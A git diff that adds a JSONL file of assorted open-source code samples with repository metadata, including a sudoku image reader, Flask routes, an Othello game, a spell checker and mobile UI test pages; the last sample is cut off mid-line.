diff --git "a/3866.jsonl" "b/3866.jsonl"
new file mode 100644
--- /dev/null
+++ "b/3866.jsonl"
@@ -0,0 +1,1729 @@
+{"seq_id":"27548907271","text":"import cv2\nimport numpy as np\nimport plotCVImg\n\n# whether to show intermediate results\nDEBUG = 1\n# standard grid cell size\nGRID_WIDTH = 40\nGRID_HEIGHT = 40\n# standard digit size\nNUM_WIDTH = 20\nNUM_HEIGHT = 20\n# sudoku dimensions\nSUDOKU_SIZE = 9\n\n# array storing the puzzle, shape=(9*9, 20*20)\nsudoku = np.zeros(shape=(9 * 9, NUM_WIDTH * NUM_HEIGHT))\n\n# read image\nimg_original = cv2.imread('./questions/01.png')\nif DEBUG:\n    plotCVImg.plotImg(img_original, \"original\")\n\n# img_original = cv2.imread('./questions/01.png')\n# img_gray = cv2.cvtColor(img_original, cv2.COLOR_BGR2GRAY)\n# img_Blur = cv2.medianBlur(img_gray, 3)\n# img_Blur = cv2.GaussianBlur(img_Blur, (3, 3), 0)","repo_name":"LemonITCN/s-engine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"39249906964","text":"\"\"\"\nCollection of minor helper functions and classes\n\"\"\"\n\nimport yaml\n\n\nclass Constants:\n\tdef __init__(self):\n\t\twith open('constants.yaml', 'r') as f:\n\t\t\tconstants = yaml.safe_load(f)\n\t\tself.constants = constants\n\t\tself.prefix = constants['prefix']\n\t\tself.prefix_start = constants['prefix_start']\n\t\tself.bucket = constants['s3_bucket_name']\n\t\n","repo_name":"Meadosc/compare_dictionaries","sub_path":"comp_dict/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"36838841019","text":"# -*- coding: utf-8 -*-\nfrom peewee import *\nfrom Db_Server import db_server\nimport csv\nimport random\n\nclass Bus_line(Model):\n    BUS_NUM = CharField(null=True)\n    STOP_CODE = CharField(null=True)  # IntegerField(null=True) would fit, but stop codes have leading zeros, so CharField is used\n    STOP_NAME = CharField(null=True)\n\n    class Meta:\n        database = db_server.psql_db  # This model uses the \"people.db\" database.\n\ndef table_create():\n    # db_server.db_connect()\n\n    db_server.table_create(Bus_line)\n\ndef table_drop():\n    # db_server.db_connect()\n\n    db_server.table_drop(Bus_line)\n\ndef insert_interest():\n\n    with open(\"C:\\\\yang\\\\bus\\\\BUS_LINE.csv\", encoding=\"utf-8\") as data_file:\n        reader = list(csv.reader(data_file, delimiter=',', quotechar='\"'))\n        reader.remove(reader[0])\n        cnt = 0\n        for row in reader:\n            Bus_line.insert(BUS_NUM=row[1], STOP_CODE=row[4], STOP_NAME=row[5]).execute()\n\n\n\n\ndef loader():\n    old_list = []\n\n    for i in Bus_line.select().order_by(Bus_line.id).tuples():\n        old_list.append(i)\n\n    return old_list\n\n\n\n\n#\n#\n\ndef sample_loader(number):\n    # end = math.ceil(len(Old_building().select().tuples())/100)\n    old_list =[]\n    rand_list = []\n\n    for i in Bus_line.select().order_by(Bus_line.id).tuples():\n        old_list.append(i)\n\n    for j in random.sample(old_list,number):\n        rand_list.append(j)\n\n# return old_list\n    return rand_list","repo_name":"CHS71/git_Python","sub_path":"Python_postrgresql9.6/Model/Bus_line.py","file_name":"Bus_line.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"2157919294","text":"from flask import Blueprint, make_response, jsonify, Response\nfrom http import HTTPStatus\nfrom functools import partial\n\nfrom ..services import data\nfrom ..middlewares.authorization import token_required\nfrom ..middlewares.validation import validate_body
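\n# note: functools.partial pre-binds each schema here, so validate_detection and\n# validate act as ready-made request-body validators for the routes below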
\nfrom ..schemas.data import DetectSchema, DataBodySchema\n\nvalidate_detection = partial(validate_body, schema = DetectSchema)\nvalidate = partial(validate_body, schema = DataBodySchema)\n\ndata_bp = Blueprint(\"data\", __name__, url_prefix=\"/data\")\n\n@data_bp.route('/detect', methods=['GET', 'POST'])\n@token_required\n@validate_detection\ndef detect_data():\n    try:\n        response = data.detect_sensor()\n        return response, HTTPStatus.OK\n    \n    except Exception as e:\n        print(e)\n        return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n\n@data_bp.route('/<id>', methods=['GET'])\n@token_required\ndef get_data(id):\n    try:\n        response = data.find_data(id)\n        return response, HTTPStatus.OK\n    \n    except Exception as e:\n        return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n\n@data_bp.route('', methods=['GET'])\n@token_required\ndef get_user_data():\n    try:\n        response = data.find_user_data()\n        return response, HTTPStatus.OK\n    \n    except Exception as e:\n        return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n    \n@data_bp.route('', methods=['POST'])\n@token_required\n@validate\ndef post_data():\n    try:\n        response = data.create_data()\n        return response, HTTPStatus.CREATED\n    \n    except Exception as e:\n        return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n    \n@data_bp.route('/<id>', methods=['PUT'])\n@token_required\n@validate\ndef put_data(id):\n    try:\n        response = data.update_data(id)\n        return response, HTTPStatus.OK\n    \n    except Exception as e:\n        return {'error': str(e)}, HTTPStatus.BAD_REQUEST\n    \n@data_bp.route('/<id>', methods=['DELETE'])\n@token_required\ndef delete_data(id):\n    try:\n        response = data.remove_data(id)\n        return response, HTTPStatus.OK\n    \n    except Exception as e:\n        return {'error': str(e)}, HTTPStatus.BAD_REQUEST","repo_name":"Tallispt/ws-api","sub_path":"ws_api/controllers/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"20044200048","text":"#!/usr/bin/env python3\nimport xml.etree.ElementTree as etree\nimport requests\nimport sys\nimport urllib.parse\n\n\nXML_URL = 'http://www.billboard.com/rss/charts/hot-100'\nROW_TMPL = \"\"\"\n<tr>\n<td>{rank}</td>\n<td>{lastrank}</td>\n<td><a href=\"{link}\">{title}</a></td>\n<td>{artist}</td>\n</tr>\n\"\"\"\nPAGE_TMPL = \"\"\"\n<!doctype html>\n<html>\n<head>\n<title>Hot 100</title>\n</head>\n<body>\n<table>\n<tr>\n<th>Rank</th>\n<th>Last Rank</th>\n<th>Title</th>\n<th>Artist</th>\n</tr>\n{body}\n</table>\n</body>\n</html>\n\"\"\"\nYOUTUBE_SEARCH_URL = 'https://youtube.com/results'\n\n\ndef fetch():\n    req = requests.get(XML_URL)\n    return etree.fromstring(req.text)\n\n\ndef get(tree):\n    for item in tree.findall('.//item'):\n        artist = item.findtext('./artist')\n        title = item.findtext('./title')\n        _, title = title.split(': ', 1)\n        url = '{}?{}'.format(\n            YOUTUBE_SEARCH_URL,\n            urllib.parse.urlencode({\n                'q': '{} {}'.format(artist, title).lower(),\n            }),\n        )\n\n        yield {\n            'artist': artist,\n            'title': title,\n            'rank': int(item.findtext('./rank_this_week')),\n            'lastrank': int(item.findtext('./rank_last_week')) or '—',\n            'link': url,\n        }\n\n\ndef dump(items):\n    body_parts = []\n    for item in items:\n        body_parts.append(ROW_TMPL.format(**item))\n    return PAGE_TMPL.format(body=''.join(body_parts))\n\n\nif __name__ == '__main__':\n    sys.stdout.write(dump(get(fetch())))\n","repo_name":"sampsyo/hot100","sub_path":"hot100.py","file_name":"hot100.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"70497062554","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport board\nimport ui\nimport pygame\nfrom pygame.locals import *\nimport player\nfrom config import BLACK, WHITE, EMPTY, HUMAN, COMPUTER\nfrom copy import deepcopy\n\nclass Othello():\n    \"\"\"\n    brain class of othello game\n\n    Members:\n\n    board --othello board module\n    gui --gui module\n    \"\"\"\n    def __init__(self):\n        self.board = board.Board()\n        self.gui = ui.GUI()\n        self.set_options()\n        self.stack = []\n\n    def set_options(self):\n        \"\"\"\n        set up players\n        \"\"\"\n        player1, player2 = self.gui.show_options()\n        if player1 == HUMAN:\n            self.now_playing = player.Human(self.gui, BLACK)\n        else:\n            self.now_playing = player.Computer(BLACK)\n        if player2 == HUMAN:\n            self.other_player = player.Human(self.gui, WHITE)\n        else:\n            self.other_player = player.Computer(WHITE)\n\n        self.gui.show_game()\n        self.gui.update_screen(self.board.board, 2, 2)\n\n    def start(self):\n        clock = pygame.time.Clock()\n        self.stack.append(deepcopy(self.board))\n        while True:\n            clock.tick(100)\n            if self.board.is_ended():\n                stone_lst = self.board.count()\n                if stone_lst[0] > stone_lst[1]:\n                    winner = BLACK\n                elif stone_lst[1] > stone_lst[0]:\n                    winner = WHITE\n                else:\n                    winner = None\n                break\n            self.now_playing.set_current_board(self.board)\n\n            selectable_index = self.board.get_selectable_index(self.now_playing.color)\n            if selectable_index != []:\n\n                # on a human's turn, guide where a stone can be placed\n                #if isinstance(self.now_playing, player.Human):\n                #    self.gui.guide_screen(selectable_index)\n\n                score, tmp = self.now_playing.move()\n                if tmp != None:\n                    self.board = tmp\n                    self.stack.append(deepcopy(tmp))\n                    self.now_playing, self.other_player = self.other_player, self.now_playing\n                else:\n                    self.stack.pop()\n                    self.stack.pop()\n                    self.board = deepcopy(self.stack[len(self.stack)-1])\n                    stone_lst = self.board.count()\n                    self.gui.update_screen(self.board.board, stone_lst[0], stone_lst[1])\n            else:\n                self.now_playing, self.other_player = self.other_player, self.now_playing\n\n\n        self.wait()\n        self.gui.show_winner(winner)\n        self.wait()\n        self.restart()\n\n    def wait(self):\n        while True:\n            for event in pygame.event.get():\n                if event.type == MOUSEBUTTONDOWN:\n                    return\n\n    def restart(self):\n        self.board = board.Board()\n        self.set_options()\n        self.start()\n\ndef main():\n    game = Othello()\n    game.start()\n\nif __name__ == '__main__':\n    
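# build the game controller and enter the main loop; restart() recurses back into start() after each game\n    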
main()\n","repo_name":"yuuyahypg/Reversi","sub_path":"othello.py","file_name":"othello.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"8675431493","text":"from django.conf.urls import include, url, static\nfrom django.contrib import admin\nfrom django.conf import settings\n\nfrom . import views\nfrom profiles import views as profile_views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^drivers$', views.drivers, name='drivers'),\n url(r'', include('tokenapi.urls')),\n url(r'^accounts/', include('registration.backends.default.urls')),\n url(r'^profiles/(?P\\w+)$', profile_views.profile, name='profile'),\n url(r'^laptimes/', include('laptimes.urls')),\n url(r'^api/laptimes/', include('laptimes.api.urls')),\n url(r'^admin/', admin.site.urls),\n]\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns += [url(r'^__debug__/', include(debug_toolbar.urls))]\n urlpatterns += static.static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n","repo_name":"ev-agelos/ac-rank","sub_path":"ac_rank/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"2205992170","text":"import inflect\np = inflect.engine()\n\nnum_str = []\nnew = []\n\na = 'abcdefghijklmnopqrstuvwxyz'\n\nfor i in range(1000001):\n num_str.append(p.number_to_words(i))\n\nnum_str = ''.join(num_str)\n\nfor i in num_str:\n if i not in new and i.isalpha():\n new.append(i)\n\nprint('the 20th letter is {}!'.format(new[19]))\n \n\n\n\n\n\n","repo_name":"leojacoby/python","sub_path":"clamp.py","file_name":"clamp.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40226352760","text":"import FWCore.ParameterSet.Config as cms\n\nfrom RecoTauTag.RecoTau.HLTPFRecoTauQualityCuts_cfi import hltPFTauQualityCuts\nfrom RecoTauTag.RecoTau.TauDiscriminatorTools import requireLeadTrack, noPrediscriminants\nfrom RecoTauTag.RecoTau.PFRecoTauDiscriminationByIsolation_cfi import pfRecoTauDiscriminationByIsolation\n\nhltPFRecoTauDiscriminationByIsolation = pfRecoTauDiscriminationByIsolation.clone(\n PFTauProducer = 'hltPFRecoTauProducer', #tau collection to discriminate\n\n # Require leading pion ensures that:\n # 1) these is at least one track above threshold (0.5 GeV) in the signal cone\n # 2) a track in the signal cone has pT > 5 GeV\n Prediscriminants = noPrediscriminants,\n\n qualityCuts = hltPFTauQualityCuts,# set the standard quality cuts\n\n # Delta-Beta corrections to remove Pileup\n particleFlowSrc = \"hltParticleFlow\",\n vertexSrc = hltPFTauQualityCuts.primaryVertexSrc,\n customOuterCone = -1.0,\n\n # This must correspond to the cone size of the algorithm which built the\n # tau. (or if customOuterCone option is used, the custom cone size)\n isoConeSizeForDeltaBeta = 0.3,\n # The delta beta factor maps the expected neutral contribution in the\n # isolation cone from the observed PU charged contribution. 
This factor can\n # optionally be a function (use 'x') of the number of vertices in the event\n # (taken from the multiplicity of vertexSrc collection)\n deltaBetaFactor = \"0.38\",\n # By default, the pt threshold for tracks used to compute the DeltaBeta\n # correction is taken as the gamma Et threshold from the isolation quality\n # cuts.\n deltaBetaPUTrackPtCutOverride = True, # Set the boolean = True to override.\n deltaBetaPUTrackPtCutOverride_val = 0.5, # Set the value for new value.\n\n # Rho corrections\n applyRhoCorrection = False,\n rhoProducer = \"kt6PFJets:rho\",\n rhoConeSize = 0.5,\n rhoUEOffsetCorrection = 1.0,\n\n IDdefinitions = cms.VPSet(),\n IDWPdefinitions = cms.VPSet(\n cms.PSet(\n IDname = cms.string(\"pfRecoTauDiscriminationByIsolation\"),\n maximumOccupancy = cms.uint32(0), # no tracks > 1 GeV or gammas > 1.5 GeV allowed\n ApplyDiscriminationByTrackerIsolation = cms.bool(True), # use PFGammas when isolating\n )\n ),\n)\n","repo_name":"cms-sw/cmssw","sub_path":"RecoTauTag/RecoTau/python/HLTPFRecoTauDiscriminationByIsolation_cfi.py","file_name":"HLTPFRecoTauDiscriminationByIsolation_cfi.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"29050726118","text":"import pandas as pd\r\nimport os\r\n\r\n#load csv\r\ndat = pd.read_csv('dat.csv')\r\n\r\n#calculate profit on each sale\r\ndat[\"Profit\"] = dat[\"Sale price\"] - dat[\"Purchase price\"]\r\n#set profit = 0 for all unsold items\r\ndat[\"Profit\"] = dat[\"Profit\"].fillna(0)\r\n#sum profit\r\nTotalProfit = dat[\"Profit\"].sum()\r\n\r\n#iterate rows and display title and profit\r\nfor index, row in dat.iterrows():\r\n print(\"Book Title: \", row[\"Textbook\"], \" profit made: \", row[\"Profit\"])\r\nprint(\"Total Profit: \", TotalProfit)","repo_name":"RileyJHarris/SDVSAC1","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"36388594199","text":"from openerp import models, fields, api\nfrom datetime import datetime as dt\nimport logging\nfrom openerp.exceptions import except_orm\n\n\nclass DPNPProcurementOrder(models.Model):\n _inherit = 'procurement.order'\n\n @api.multi\n def run(self, autocommit=False):\n res = super(DPNPProcurementOrder, self).run(autocommit)\n pur_obj = self.mapped('purchase_id')\n sale_obj = self.mapped(lambda x:x.sale_line_id.mapped(lambda y:y.order_id))\n sale_obj.ensure_one()\n newport_supplier = self.env['res.partner'].sudo().search([('company_code', '=', 'New Port')])\n if not newport_supplier:\n raise except_orm('Warning', 'Please create 1 Company with Company Code is *New Port*')\n newport_supplier.ensure_one()\n pur_obj.write({'purchaser': sale_obj.user_id.id, 'date_order': dt.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'partner_id': newport_supplier.id, 'vessel_name': sale_obj.vessel_name.id, 'vessel_id':sale_obj.vessel_id.id,\n 'other_vessel_name': sale_obj.other_vessel_name, 'other_shipping_agent': sale_obj.other_shipping_agent, 'order_mobile_number':sale_obj.order_mobile_number,\n 'order_contact_person': sale_obj.order_contact_person, 'shipping_agent_id': sale_obj.shipping_agent_id.id, 'crNum':sale_obj.shipping_agent_id.crNum,\n 'next_port_id': sale_obj.next_port_id.id,\n 'last_port_id': sale_obj.last_port_id.id,\n 'so_id': sale_obj.id,\n 'invoice_method': 'manual'})\n pur_obj.sudo().signal_workflow('purchase_confirm')\n return 
res","repo_name":"ct-17/pptech","sub_path":"erp_digital_platform/addons/dp_np_api/models/procurement.py","file_name":"procurement.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"4572436396","text":"import asyncio\nimport pytest\nfrom user_manager.user_manager import UserManager\n\n@pytest.fixture\ndef user_manager() -> UserManager:\n    \"\"\"Creates a UserManager instance for each test.\"\"\"\n    return UserManager()\n\n@pytest.mark.asyncio\nasync def test_get_user_creates_new_user(user_manager: UserManager):\n    \"\"\"\n    Checks that get_user correctly creates a new user and initializes its properties.\n    \"\"\"\n    user_id = \"12345\"\n    user = await user_manager.get_user(user_id)\n    assert user.id == user_id\n    assert user.is_processing == False\n\n@pytest.mark.asyncio\nasync def test_get_user_returns_existing_user(user_manager: UserManager):\n    \"\"\"\n    Checks that get_user returns the existing User object if one was already created for the given user_id.\n    \"\"\"\n    user_id = \"12345\"\n    user1 = await user_manager.get_user(user_id)\n    user2 = await user_manager.get_user(user_id)\n    assert user1 is user2\n\n@pytest.mark.asyncio\nasync def test_users_are_independent(user_manager: UserManager):\n    \"\"\"\n    Checks that each User object handles its state independently of other User objects.\n    \"\"\"\n    user1 = await user_manager.get_user(\"123\")\n    user2 = await user_manager.get_user(\"456\")\n    await user1.start_processing()\n    assert user1.is_processing == True\n    assert user2.is_processing == False","repo_name":"NailsRumford/BilliBot","sub_path":"tests/test_user_manager.py","file_name":"test_user_manager.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
+{"seq_id":"74903013276","text":"'''\nCreated on Oct 3, 2018\nI pledge my honor that I have abided by the Stevens Honor System\n@author: Andrea Meyer\nusername: ameyer\n'''\nimport time\nfrom cs115 import map\n\nwords = []\nHITS = 10\n\ndef ED(first, second):\n    ''' Returns the edit distance between the strings first and second.'''\n    if first == '':\n        return len(second)\n    elif second == '':\n        return len(first)\n    elif first[0] == second[0]:\n        return ED(first[1:], second[1:])\n    else:\n        substitution = ED(first[1:], second[1:])\n        deletion = ED(first[1:], second)\n        insertion = ED(first, second[1:])\n        return 1 + min(substitution, deletion, insertion)\n    \nprint(ED(\"spam\", \"xsam\"))\nprint(ED(\"foo\", \"\"))\nprint(ED(\"foo\", \"bar\"))\nprint(ED(\"hello\", \"below\"))\nprint(ED(\"yes\", \"yelp\"))\n\ndef fastED(s1, s2):\n    '''Returns the edit distance between the strings first and second. 
Uses\n memoization to speed up the process.'''\n def fastED_helper(s1, s2, memo):\n if (s1, s2) in memo:\n return memo[(s1, s2)]\n if s1 == '':\n return len(s2)\n if s2 == '':\n return len(s1)\n elif s1[0] == s2[0]:\n result = fastED_helper(s1[1:], s2[1:], memo)\n else:\n substitution = fastED_helper(s1[1:], s2[1:], memo)\n deletion = fastED_helper(s1[1:], s2, memo)\n insertion = fastED_helper(s1, s2[1:], memo)\n result = 1 + min(substitution, deletion, insertion)\n memo[(s1, s2)] = result\n return result\n return fastED_helper(s1, s2, {})\nprint(fastED(\"antidisestablishment\", \"antiquities\"))\nprint(fastED(\"xylophone\", \"yellow\"))\nprint(fastED(\"follow\", \"yellow\"))\nprint(fastED(\"lower\", \"hover\"))\n\n\ndef getSuggestions(user_input):\n '''For each word in the global words list, determine the edit distance of\n the user_input and the word. Return a list of tuples containing the\n (edit distance, word).\n Hint: Use map and lambda, and it's only one line of code!'''\n return map(lambda word: (fastED(user_input, word), word), words)\n\ndef spam():\n '''Main loop for the program that prompts the user for words to check.\n If the spelling is correct, it tells the user so. Otherwise, it provides up\n to HITS suggestions.\n\n To exit the loop, just hit Enter at the prompt.'''\n while True:\n user_input = input('spell check> ').strip()\n if user_input == '':\n break\n if user_input in words:\n print('Correct')\n else:\n start_time = time.time()\n suggestions = getSuggestions(user_input)\n suggestions.sort()\n endTime = time.time()\n print('Suggested alternatives:')\n for suggestion in suggestions[:HITS]:\n print(' %s' % suggestion[1])\n print('Computation time:', endTime - start_time, 'seconds')\n print('Bye')\n\nif __name__ == '__main__':\n f = open('3esl.txt')\n for word in f:\n words.append(word.strip())\n f.close()\n spam()","repo_name":"ameyer2145/CS115","sub_path":"lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"41793597863","text":"\nfrom mobile.mitem_ui_test.mitem_ui_test.pages.common_list_page import *\nfrom mobile.mitem_ui_test.mitem_ui_test.pages.title_improve_detail_page import *\nfrom mobile.mitem_ui_test.mitem_ui_test.item_info import *\nfrom mobile.mitem_ui_test.mitem_ui_test.pages.shop_test_page import *\n\nclass ItemList(CommonList):\n\n go_detail_locator = ('and', (('attr.*=', ('text', '销量: \\d*件')),))\n on_shelf_button_locator = ('and', (('attr=', ('text', '上架')),))\n off_shelf_button_locator = ('and', (('attr=', ('text', '下架')),))\n promotion_button_locator = ('and', (('attr=', ('text', '促销推广')),))\n title_optimization_button_locator = ('and', (('attr.*=', ('text', '标题.*')),))\n mobile_detail_button_locator = ('and', (('attr=', ('text', '手机详情')),))\n copy_link_button_locator = ('and', (('attr=', ('text', '复制链接')),))\n two_dimensional_code_button_locator = ('and', (('attr=', ('text', '二维码')),))\n choose_button_locator = ('and', (('attr=', ('text', '筛选')),))\n long_click_two_dimensional_code_locator = ('and', (('attr=', ('text', '长按识别二维码')),))\n more_function_locator = ('and', (('attr=', ('text', '···')),))\n tab_onsale_locator = ('and', (('attr.*=', ('text', '出售中.*')),))\n tab_inventory_locator = ('and', (('attr.*=', ('text', '仓库中.*')),))\n tab_soldout_locator = ('and', (('attr.*=', ('text', '已售完.*')),))\n\n calendar_anchor = ('and', (('attr.*=', ('text', '立即.*')),))\n\n # 方法,滑动弹窗\n def swipe_618(self):\n 
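# added note: swipes the promo overlay upward to dismiss it ('618' likely refers to the June 18 sale banner)\n        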
poco(name='android.widget.Image').swipe([0, 1])\n\n # 方法:进入宝贝详情页\n def go_detail_page(self):\n element_click(self.go_detail_locator)\n try:\n poco(textMatches='.*授权.*', name='com.taobao.qianniu:id/open_auth_btn_grant').wait_for_appearance(\n 5) # 第一次进入授权,5秒显示等待\n poco(textMatches='.*授权.*', name='com.taobao.qianniu:id/open_auth_btn_grant').click()\n except Exception:\n pass\n poco(text='编辑图片').wait_for_appearance(6) # 跳转详情页,3秒显示等待\n poco(text='查看宝贝').click()\n self.turn_back()\n # self.swipe_618()\n\n\n # 获取出售中数量\n def get_onsale_number(self):\n onsale_number = poco(name='tab0')\n onsale_number_text = get_text_of_view(onsale_number)\n num = re.findall('\\d+', onsale_number_text)\n return int(num[0])\n\n # 获取仓库中数量\n def get_inventory_number(self):\n inventory_number = poco(name='tab1')\n inventory_number_text = get_text_of_view(inventory_number)\n num = re.findall('\\d+', inventory_number_text)\n return int(num[0])\n\n # 获取已售完数量\n def get_soldout_number(self):\n soldout_number = poco(name='tab2')\n soldout_number_text = get_text_of_view(soldout_number)\n num = re.findall('\\d+', soldout_number_text)\n return int(num[0])\n\n # 获取第一个宝贝库存数量\n def get_stock_number(self):\n stock_text = poco(textMatches='库存.*').get_text()\n num = re.findall('\\d+', stock_text)\n return int(num[0])\n\n # 获取第一个宝贝销量数量\n def get_sold_number(self):\n sold_text = poco(textMatches='销量.*').get_text()\n num = re.findall('\\d+', sold_text)\n return int(num[0])\n\n # 上架第一个宝贝\n def on_shelf_list(self):\n if not init_element(self.on_shelf_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n self.element_click_async(self.on_shelf_button_locator)\n poco(text='确定').click()\n\n #下架\n def off_shelf_list(self):\n if not init_element(self.off_shelf_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n self.element_click_async(self.off_shelf_button_locator)\n poco(text='确定').click()\n\n #促销推广\n def promotion_list(self) -> bool:\n self.element_click_async(self.promotion_button_locator)\n poco(text='满减优惠').click()\n self.check_QN_auth()\n self.check_AYitem_auth()\n # 立刻创建1个满减优惠活动,判断是否成功\n self.quick_create()\n # 返回,进入促销打折页面,立刻创建1个促销打折活动,判断是否成功\n sleep(3)\n self.turn_back()\n poco(text='促销打折').click()\n self.check_QN_auth()\n self.check_AYitem_auth()\n self.quick_create()\n # 结束创建成功的促销打折活动,避免影响店铺体检跳转ump\n poco(name=' 知道了 ').click()\n poco(name='android.support.v7.widget.RecyclerView').swipe([0, 1])\n sleep(2)\n poco(name='结束活动').click()\n poco(text='确定').click()\n sleep(1)\n self.turn_back()\n return True\n\n # 快速创建ump活动\n def quick_create(self) -> bool:\n \"\"\"\n\n :return:\n 如果创建失败,返回False\n \"\"\"\n try:\n poco(name=' 创建活动 ').wait_for_appearance(5) # 跳转ump页面,5秒显示等待\n except PocoTargetTimeout:\n return False\n poco(name=' 创建活动 ').click()\n poco(name='确定提交').click()\n try:\n poco(name='活动已创建成功!').wait_for_appearance(5)\n except PocoTargetTimeout:\n return False\n\n #标题优化\n def title_optimization_list(self) -> bool:\n self.element_click_async(self.title_optimization_button_locator)\n poco(text=ITEM_INVENTORY_TITLE).wait_for_appearance(10) # 跳转标题优化详情页,10秒显示等待\n TitleImproveDetail().edit_title('标题')\n title_before_improve = TitleImproveDetail().get_title()\n TitleImproveDetail().one_click_improve()\n sleep(3) # 一键优化,3秒sleep\n title_after_improve = TitleImproveDetail().get_title()\n return title_after_improve != title_before_improve\n\n #手机详情\n def mobile_detail_list(self) -> bool:\n self.element_click_async(self.mobile_detail_button_locator)\n try:\n 
poco(textMatches='.*生成.*').wait_for_appearance(5) # 跳转手机详情,3秒显示等待\n except PocoTargetTimeout:\n return False\n poco(textMatches='.*生成.*').click()\n try:\n poco(text='预计剩余时间').wait_for_appearance(3)\n except PocoTargetTimeout:\n return False\n self.turn_back()\n return True\n\n #复制链接\n def copy_link_list(self):\n if not init_element(self.copy_link_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n #淘宝链接\n copy_link_button = init_element(self.copy_link_button_locator)\n assert self.search_by_keyword('测试多sku属性宝贝',copy_link_button), '宝贝不存在'\n copy_link_button.click()\n poco(text = '取消').wait_for_appearance(5)\n poco(text = '淘宝链接').click()\n choose_button = init_element(self.choose_button_locator)\n search_close_button = locate_by_anchor(choose_button,3,'l0l0l1')\n search_close_button.click()\n element_click(self.search1_locator)\n poco(name='android.widget.EditText').long_click()\n poco(text = '粘贴').click()\n text1 = poco(name='android.widget.EditText').get_text()\n self.turn_back()\n #防微信屏蔽链接\n assert self.search_by_keyword(ITEM_COPY_LINK_TITLE, copy_link_button), '宝贝不存在'\n copy_link_button.click()\n poco(text='取消').wait_for_appearance(5)\n poco(text='防微信屏蔽链接').click()\n choose_button = init_element(self.choose_button_locator)\n search_close_button = locate_by_anchor(choose_button, 3, 'l0l0l1')\n search_close_button.click()\n element_click(self.search1_locator)\n poco(name='android.widget.EditText').long_click()\n poco(text='粘贴').click()\n text2 = poco(name='android.widget.EditText').get_text()\n self.turn_back()\n\n return text1,text2\n\n # 查看详情\n def view_detail_list(self, my_title: str):\n if not init_element(self.two_dimensional_code_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n view_detail_ele = locate_by_anchor(init_element(self.two_dimensional_code_button_locator), 2, 'l3')\n view_detail_ele.click()\n try:\n poco(text=my_title).wait_for_appearance(10)\n self.turn_back()\n return True\n except PocoTargetTimeout:\n self.turn_back()\n return False\n\n\n # 二维码\n def two_dimensional_code_list(self):\n if not init_element(self.two_dimensional_code_button_locator).exists():\n self.element_click_async(self.more_function_locator)\n else:\n pass\n self.element_click_async(self.two_dimensional_code_button_locator)\n poco(text='下载图片').click()\n try:\n poco(text='图片下载失败').wait_for_appearance(8) # 等待文件保存到本地,8秒显示等待\n poco(text='确认').click()\n return False\n except PocoTargetTimeout:\n return True\n\n # 切换顶部tab\n def switch_tab(self, index: int):\n \"\"\"\n\n :param index:\n 0:出售中\n 1:仓库中\n 2:已售完\n :return:\n \"\"\"\n tab_dict = {\n 0: self.tab_onsale_locator,\n 1: self.tab_inventory_locator,\n 2: self.tab_soldout_locator\n }\n init_element(tab_dict.get(index)).invalidate()\n element_click(tab_dict.get(index))\n\n # 点击列表活动日历,跳转功能\n def activity_calendar_shop_test_enter(self) -> bool:\n # 如果日历下线,跳转店铺体检\n sleep(3)\n if not init_element(self.calendar_anchor).exists():\n print('日历已下线,跳转店铺体检')\n BasePage().close_auto_list()\n poco(text='查看详情').click()\n poco(text='一键优化').wait_for_appearance(60)\n ShopTest().click_one_touch_optimize()\n advertising_num = ShopTest().get_advertising_testing_num()\n baby_time_num = ShopTest().get_baby_up_and_down_num()\n hand_weights_num = ShopTest().get_hand_weights_num()\n if advertising_num != '0':\n return False\n if baby_time_num != '0':\n return False\n if hand_weights_num != '0':\n return False\n return True\n\n # 如果日历没下线,跳转活动日历\n else:\n my_function = 
